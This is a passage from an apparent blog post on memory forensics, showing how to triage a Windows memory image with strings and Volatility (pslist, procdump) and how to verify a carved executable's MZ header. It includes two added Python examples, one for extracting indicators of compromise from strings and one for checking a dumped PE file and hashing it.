    If you had an unknown process with hooks into the kernel, you could find it here.

    Now these are all great tools, but what do you do with a memory image after you have it? There are some basic techniques you can use to do analysis. I would start with a "strings" command, so you can run strings memory.img > memory.str. Then you can begin to parse the file for emails, websites surfed to or connected to by malware, passwords, blogged text, and unknown executables.
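    The strings-then-grep triage described above, as an added example that is not part of the original post: it pulls printable ASCII and UTF-16LE runs out of a raw image (plain strings misses the UTF-16 text Windows uses for paths and registry data unless you pass -e l) and matches them against a few indicator patterns. The sample image bytes are constructed for the example.

```python
import re
import sys
from typing import Dict, List

# Constructed sample "memory image" (hypothetical, not a real capture):
# ASCII and UTF-16LE strings surrounded by junk bytes.
SAMPLE_IMAGE = (
    b"\x00\x8a\xff" + b"http://example.test/update.php" + b"\x00\x01"
    + "alice@example.test".encode("utf-16-le") + b"\x00\x00\x13"
    + b"68.142.101.68" + b"\x7f\x00"
    + "C:\\Users\\bob\\Desktop\\evil.exe".encode("utf-16-le") + b"\x00\x00"
    + b"ab\xfe"  # too short to count as a string
)

def extract_strings(image: bytes, min_len: int = 4) -> List[str]:
    """ASCII runs (what 'strings' prints by default) plus UTF-16LE runs,
    which Windows uses for most paths, registry and UI text and which
    'strings' without -e l silently misses."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(image)]
    found += [m.group().decode("utf-16-le") for m in utf16_re.finditer(image)]
    return found

# Indicator patterns the post suggests grepping the strings output for.
IOC_PATTERNS = {
    "url": re.compile(r"https?://[^\s\"'<>]+"),
    "email": re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+"),
    # Also matches version-like numbers; triage hits before acting on them.
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "exe_path": re.compile(r"[A-Za-z]:\\(?:[^\\\s]+\\)*[^\\\s]+\.exe", re.I),
}

def find_iocs(image: bytes) -> Dict[str, List[str]]:
    """Map indicator type -> unique hits, in order of first appearance."""
    hits: Dict[str, List[str]] = {kind: [] for kind in IOC_PATTERNS}
    for s in extract_strings(image):
        for kind, pattern in IOC_PATTERNS.items():
            for match in pattern.findall(s):
                if match not in hits[kind]:
                    hits[kind].append(match)
    return hits

if __name__ == "__main__":
    # Usage: python find_iocs.py memory.img (reads the whole file into RAM)
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_IMAGE
    for kind, values in find_iocs(data).items():
        print(kind, values)
```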

    Once you have your image, you might choose to use a tool called Volatility. This tool simply ROCKS!

    Here is how it works using Linux:

    python volatility command -f /path_to_windows_memory_image

    The keyword command refers to a series of commands that you can choose from. Here is a list:

    [Screenshot: Volatility command list]

    So what can we do with this? Let me show you. First let’s see what processes are running in memory.

    First I type the command:

    python volatility pslist -f /path_to_image/imagefile.img

    and I will see output like this:

    [Screenshot: pslist output]

    Now you can see the executables running. You can also see from the second column what the PID (Process ID) is. So let's say we did not know what jusched.exe (PID 2228) was, we thought it might be malware, and we would like to send it to VirusTotal. Well then, let's grab it right out of memory.

    python volatility procdump -p 2228 -f /path_to_image/imagefile.img

    [Screenshot: procdump output]

    Now we have carved that process out. However, to be sure we did this correctly, let's take a look at it using khexedit. Since this is supposed to be an .exe file, it should start off in hex with MZ.

    So in Linux: khexedit executable.2228.exe

    [Screenshot: khexedit showing the MZ header]

    We can see that it is in fact what we are looking for, so we could now send this up to VirusTotal, or look deeper into the file to see what it does.
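    The same sanity check done in code rather than by eye in khexedit, as an added example that is not part of the original post or of Volatility: it verifies the MZ and PE signatures of a carved process, reads the machine type and section count from the COFF header, and computes the SHA-256 you would look up on VirusTotal before uploading anything. The sample PE-shaped blob is constructed for the test and is not a runnable binary.

```python
import hashlib
import struct
import sys
from typing import Dict

MACHINE_NAMES = {0x14C: "i386", 0x8664: "x64"}  # IMAGE_FILE_MACHINE_* values

def build_sample_pe() -> bytes:
    """Constructed, minimal PE-shaped blob for testing (not a real binary):
    a DOS header whose e_lfanew points at a PE signature and COFF header."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\x00" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff_header = struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 0, 0x0102)
    return dos_header + b"PE\x00\x00" + coff_header

def check_dumped_pe(data: bytes) -> Dict[str, object]:
    """Verify the MZ/PE signatures of a carved process and hash it for a
    VirusTotal lookup. Stops at the first failed check."""
    result: Dict[str, object] = {
        "mz": False, "pe": False, "machine": None, "sections": None,
        "sha256": hashlib.sha256(data).hexdigest(),
    }
    if len(data) < 0x40 or data[:2] != b"MZ":
        # Not necessarily garbage: some malware wipes its in-memory PE
        # header, so a failed MZ check is itself worth noting in the report.
        return result
    result["mz"] = True
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return result
    result["pe"] = True
    machine, sections = struct.unpack_from("<HH", data, e_lfanew + 4)
    result["machine"] = MACHINE_NAMES.get(machine, hex(machine))
    result["sections"] = sections
    return result

if __name__ == "__main__":
    # Usage: python check_dump.py executable.2228.exe
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for key, value in check_dumped_pe(blob).items():
        print(f"{key}: {value}")
```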

    Well, that is it for memory on this post. As always: be good, be safe, hack legally and responsibly, and share the knowledge. I'm out.